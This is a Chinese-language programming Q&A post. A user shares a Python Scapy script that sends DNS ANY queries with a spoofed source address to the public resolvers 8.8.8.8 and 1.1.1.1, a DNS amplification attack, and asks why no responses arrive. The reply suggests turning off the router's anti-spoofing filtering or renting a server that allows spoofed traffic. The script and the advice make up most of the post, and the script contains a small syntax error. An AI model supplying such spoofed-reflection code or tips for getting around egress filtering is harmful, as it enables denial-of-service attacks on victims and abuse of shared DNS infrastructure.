Dns放大攻击演示

2024-09-30 12:17:38 发布

您现在位置:Python中文网/ 问答频道 /正文

我编写了一个脚本来模拟DNS放大攻击

from scapy.all import *


target='XXXXXXXX'

for ip in ('8.8.8.8', '1.1.1.1')
    packet = IP(src=target, dst=ip)/UDP(dport=53)/DNS(rd=1, qdcount=1, qd=DNSQR(qname='google.com', qtype='ANY'))
    send(packet)

在目标机器中,我运行Netcat从DNS服务器获取响应

目标计算机是具有公共IP地址的VPS

ncat -nlvp 53

ncat -u -nlvp 53

但我没有得到任何回应,哪里错了


Tags: infromimportip脚本target目标for
1条回答
网友
1楼 · 发布于 2024-09-30 12:17:38

您的DNS放大可能无法工作,因为您使用伪造的ip地址发送它。您的网络路由器可能会阻止传出的伪造流量。唯一的尝试方法是禁用路由器上的网络流量过滤,或者购买启用了欺骗的专用服务器/vps

相关问题 更多 >

    热门问题